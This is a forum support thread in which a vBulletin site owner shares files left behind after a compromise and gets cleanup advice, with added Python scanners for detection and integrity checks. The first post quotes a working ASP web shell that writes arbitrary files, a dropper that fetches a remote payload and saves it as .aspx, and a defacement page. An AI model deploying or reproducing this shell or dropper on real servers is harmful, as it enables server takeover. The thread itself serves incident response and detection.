xss.asp; ??

  • Syxguns
    Senior Member
    • Aug 2011
    • 151
    • 4.2.X

    [Forum] xss.asp; ??

    My Wordpress / vBulletin 4 forum has been hacked. I found a lot of issues on the WP side of things, and I started combing through the files on vBulletin. I found xss.asp; which is a text document with the following code in it.

Code:
<%
' Part 1: work out this script's own filename and cache it in the session.
' Note the quirk in the original: myScriptName is still empty the first
' time session(myScriptName) is read, so the lookup key is session("").
set fso = Server.CreateObject("Scripting.FileSystemObject")
mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
if session(myScriptName) = "" then
    ' walk backwards from the end of the physical path to the last "\"
    for x = len(mapPath) to 0 step -1
        myScriptName = mid(mapPath,x)
        if instr(1,myScriptName,"\")>0 then
            myScriptName = mid(mapPath,x+1)
            x=0
            session(myScriptName) = myScriptName
        end if
    next
Else
    myScriptName = session(myScriptName)
end if
%>
<%
' Part 2: the web shell itself (the original has this on a single line).
' The ProgID "Scripting.FileSystemObject" is assembled from short string
' fragments so that a plain-text search for the object name misses it.
dim objfso
dim fdata
dim objcountfile
on error resume next
set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")
' syfdpath = target path on the server, cyfddata = content to write.
' Both come straight from the request, so anyone who can reach this URL
' can write any file the IIS worker account can write.
if trim(request("syfdpath"))<>"" then
    fdata = request("cyfddata")
    set objcountfile=objfso.createtextfile(request("syfdpath"),true)
    objcountfile.write fdata
    if err =0 then
        response.write "<font color=red>save success!</font>"
    else
        response.write "<font color=red>save unsuccess!</font>"
    end if
    err.clear
end if
objcountfile.close
set objcountfile=nothing
set objfso = nothing
' The HTML form that drives the shell: it posts back to this same script
' and prints the script's physical path.
response.write "<center><form action="" method=post>"
%><%=server.mappath(request.servervariables("script_name"))%><%
response.write "<br>"
response.write "<input type=text name=syfdpath width=32 size=50>"
response.write "<br>"
response.write "<textarea name=cyfddata cols=100 rows=10 width=32></textarea>"
response.write "<br>"
response.write "<input type=submit value=SAVE>"
response.write "</form></center>"
%>
    I also found a file named zart.asp; which is a jpg file, but I can't open it in Dreamweaver, or Fireworks, but was able to open it with Notepad++.

Code:
<% Option Explicit
' Dropper: fetches a file from a remote host and writes it next to this
' script under an .aspx name. Nothing here is vBulletin code.
Dim cOUT,scc,cURL,objXML,binXML,objADO
' Physical path of this script. Dropping the last 13 characters (a name
' such as "zart.asp;.jpg" is exactly 13 characters) leaves its directory.
' The ";" in the name is what makes IIS 6 run the file as ASP despite
' the trailing .jpg.
scc = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
cOUT = Left(scc,Len(scc) - 13)
' Remote payload and the local name it is saved under.
cURL = "http://hamyaran.sharif.edu/gallery/images/1.txt"
Const cform = "Default.cs.aspx"
' Download the payload as raw bytes ...
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET", cURL , False
objXML.Send
binXML = objXML.ResponseBody
Set objXML = Nothing
' ... and write them to disk through ADODB.Stream
' (Type 1 = binary stream, SaveToFile mode 2 = overwrite an existing file).
Set objADO = server.CreateObject("ADODB.Stream")
objADO.Type = 1
objADO.Open
objADO.Write binXML
objADO.SaveToFile cOUT & cform,2
Set objADO = Nothing
Response.Write "downloaded."
%>
    I'll follow this with the following files I found in the root of vB4:

BBHH.html (I know this is a hack file)
    site.php;.jpg
    zart.php;.jpg
    xss.asp;.txt
    teste.txt (code below)


Code:
<html>
<head>
<title>HackeD bY BLACK BURN (BBHH)</title>
</head>
<body bgcolor = Black>
<center><h1> <font color= red>HackeD bY BLACK BURN (BBHH)</font> </h1> </center>
<hr >
<br>
<br>
<center> <h3><font color= blue>We Show No Mercy,Take No Mercy:We Are Legends,We Are Sniper's,Be Ware - We Are Here - We Are Everywhere,Respect Us</font> </h3></center>
<br>
<center><img src = "http://i39.tinypic.com/24dlshg.jpg"></center>
<br>
<center><font color = red>GREETZ :- Xtor,Back Bone,Orion Hunter,cyb3r_gangst3r, K_5h3ll,N3opHyT3H4ck3r,RKHM00N,Gh0st KilL3r,Death WisheR,Z3RO,Whishper
Death,cMshAcK,v0174g3,Sakib Sami And All Bangladesh Black Hat Hackers </font></center>
<!-- hidden 1x1 Flash embed that autoplays a YouTube video -->
<embed src="http://www.youtube.com/v/XYKUeZQbMF0&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
</body>
</html>
    Okay, there may be more but I need to know if I can just delete the files, and if all of these files are hacked files. I see no mention of who the coder is on most of the files. What steps do I follow to clean my board? Many thanks for your assistance.

BTW, admincp and modcp are not the names I used; I followed this thread for security: Secure your vB forum
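As an added example (not part of the original post or of vBulletin), the following script turns the artefacts listed above into detection rules and runs them over a constructed sample web root: the split-string ProgID and CreateTextFile(Request(...)) from xss.asp;, the XMLHTTP plus ADODB.Stream.SaveToFile pattern from zart.asp;, the "HackeD bY" banner, a ";" anywhere in a filename, and any .asp/.aspx file inside a PHP application. The sample files are shortened copies of the posted code, written to a temporary directory so the script runs offline.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Content heuristics, each derived from one of the files quoted in the post.
CONTENT_RULES = [
    # "S"+"cr"+"ipt"+... : a COM ProgID split into fragments to defeat grep
    ("split-string ProgID",
     re.compile(r'"[^"]{1,4}"\s*\+\s*"[^"]{1,4}"\s*\+\s*"[^"]{1,4}"')),
    # CreateTextFile(Request(...)) : file write with an attacker-chosen path
    ("file write from request parameter",
     re.compile(r"createtextfile\s*\(\s*request\s*\(", re.I)),
    # XMLHTTP download followed by ADODB.Stream.SaveToFile : a dropper
    ("remote download to disk",
     re.compile(r"XMLHTTP[\s\S]{0,800}?ADODB\.Stream[\s\S]{0,400}?SaveToFile", re.I)),
    ("defacement banner", re.compile(r"hacked\s+by", re.I)),
]

# Filename heuristics. A ';' in a name is the IIS 6 trick that runs
# "x.asp;.jpg" as ASP, and a PHP forum has no business serving .asp/.aspx.
NAME_RULES = [
    ("semicolon in filename", re.compile(r";")),
    ("ASP script in a PHP application", re.compile(r"\.aspx?(?=[;.]|$)", re.I)),
]


def scan_file(path: Path) -> list[str]:
    """Return the names of every rule that fires on one file."""
    hits = [name for name, rx in NAME_RULES if rx.search(path.name)]
    try:
        text = path.read_text(encoding="utf-8", errors="ignore")
    except OSError:
        return hits
    hits += [name for name, rx in CONTENT_RULES if rx.search(text)]
    return hits


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Map each flagged file (relative POSIX path) to the rules it tripped."""
    findings: dict[str, list[str]] = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            hits = scan_file(p)
            if hits:
                findings[p.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample web root: shortened copies of the posted artefacts plus
# two harmless files. These are test fixtures, not the real files.
SAMPLE_FILES = {
    "xss.asp;.txt": (
        '<%set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"'
        '+"ys"+"tem"+"ob"+"jec"+"t")\n'
        'set objcountfile=objfso.createtextfile(request("syfdpath"),true)%>'
    ),
    "zart.php;.jpg": (
        '<% Set objXML = CreateObject("Microsoft.XMLHTTP")\n'
        'Set objADO = server.CreateObject("ADODB.Stream")\n'
        'objADO.SaveToFile cOUT & cform,2 %>'
    ),
    "teste.txt": "<title>HackeD bY BLACK BURN (BBHH)</title>",
    "index.php": '<?php echo "forum home"; ?>',
    "css/style.css": "body { color: #000; }",
}


def build_sample_tree() -> Path:
    """Write SAMPLE_FILES into a fresh temporary directory and return it."""
    root = Path(tempfile.mkdtemp(prefix="vbroot-"))
    for rel, body in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_tree()).items():
        print(f"{rel}: {', '.join(hits)}")
```

Point it at the real forum root instead of build_sample_tree() to triage a live site; the name rules alone would have flagged every file in the poster's list, and the content rules catch copies that were renamed to something innocuous.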
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73976

    #2
    Not a vBulletin file. Looks like something whoever attacked your site left behind. We don't use any files named with an asp extension.

    You can run suspect file diagnostics under Maintenance -> Diagnostics to have vBulletin show you what files have been changed or don't belong.

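The suspect-file diagnostic recommended above is a manifest comparison: hash every file under the forum root and compare against known-good checksums. The script below is an added example of that check (my code, not vBulletin's diagnostic) with constructed sample files; it reports modified core files, unknown files (a dropped shell or defacement page), and missing files, and it assumes a user-upload directory named customavatars/ that should not be reported as unknown. The manifest must come from a clean copy of the exact vBulletin version, never from the compromised host.

```python
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large attachments do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Relative POSIX path -> SHA-256 for every regular file under root."""
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def check_integrity(root: Path, manifest: dict[str, str],
                    ignore_prefixes: tuple[str, ...] = ()) -> dict[str, list[str]]:
    """Compare a live tree against a known-good manifest.

    modified: present in both, but the hash differs (a patched core file)
    unknown:  on disk but not in the manifest (a dropped shell or defacement)
    missing:  in the manifest but gone from disk
    Paths under ignore_prefixes (user uploads) are not reported as unknown.
    """
    current = build_manifest(root)
    report: dict[str, list[str]] = {"modified": [], "unknown": [], "missing": []}
    for rel, digest in current.items():
        if rel in manifest:
            if manifest[rel] != digest:
                report["modified"].append(rel)
        elif not rel.startswith(ignore_prefixes):
            report["unknown"].append(rel)
    report["missing"] = [rel for rel in manifest if rel not in current]
    return report


# Constructed stand-in for a clean install (names only; not real vBulletin files).
CLEAN_FILES = {
    "index.php": "<?php // forum front controller ?>",
    "includes/config.php": "<?php $config['Database']['dbname'] = 'forum'; ?>",
    "install/install.php": "<?php // installer ?>",
}


def demo() -> dict[str, list[str]]:
    """Build a clean tree, take its manifest, then tamper with it as an attacker would."""
    root = Path(tempfile.mkdtemp(prefix="vbcheck-"))
    for rel, body in CLEAN_FILES.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body, encoding="utf-8")
    manifest = build_manifest(root)  # taken while the tree is still clean

    # Simulate the situation in the post: a core file altered, a shell dropped
    # under a "x.asp;.txt" name, the installer deleted, and a normal avatar upload.
    (root / "includes/config.php").write_text(
        CLEAN_FILES["includes/config.php"] + "\n// tampered", encoding="utf-8")
    (root / "xss.asp;.txt").write_text(
        '<% set objfso = server.createobject("Scripting.FileSystemObject") %>',
        encoding="utf-8")
    (root / "install/install.php").unlink()
    (root / "customavatars").mkdir()
    (root / "customavatars/avatar1.gif").write_bytes(b"GIF89a")

    return check_integrity(root, manifest, ignore_prefixes=("customavatars/",))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

On a real site, generate the manifest from a freshly downloaded package with build_manifest() and run check_integrity() against the web root; anything in "unknown" that is not an upload or a deliberate customisation is exactly what the poster is hunting for.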

    • Syxguns
      Senior Member
      • Aug 2011
      • 151
      • 4.2.X

      #3
Thank you, I will run the diagnostics right away.


      • Syxguns
        Senior Member
        • Aug 2011
        • 151
        • 4.2.X

        #4
        After an upgrade or installation, it is important that you delete the /install/ folder. This is necessary to provide proper security to your installation.
        An alternative would be to place the following within an .htaccess file in your /install/ folder:

order deny,allow
deny from all
        Thank you, I noticed this message after logging into my account. Do you have a link to any more security tips? I have renamed the admincp and modcp, I will now remove the install folder.

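The two-line .htaccess quoted in the admin notice above uses Apache 2.2 syntax; on Apache 2.4 those directives only work if mod_access_compat is loaded, so an /install/ directory that an admin believes is blocked may be wide open. The following is an added example (not from vBulletin's notice) that covers both server versions; it assumes AllowOverride permits authorisation directives in that directory.

```apache
# /install/.htaccess (added example; deleting the folder is still the better fix)
<IfModule mod_authz_core.c>
    # Apache 2.4 native syntax
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    # Apache 2.2 syntax, as quoted in the admin notice
    Order deny,allow
    Deny from all
</IfModule>
```

Verify the result from outside the server: a request for /install/ must return 403 from either Apache version, and an unexpected 200 means AllowOverride is disallowing the directives.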
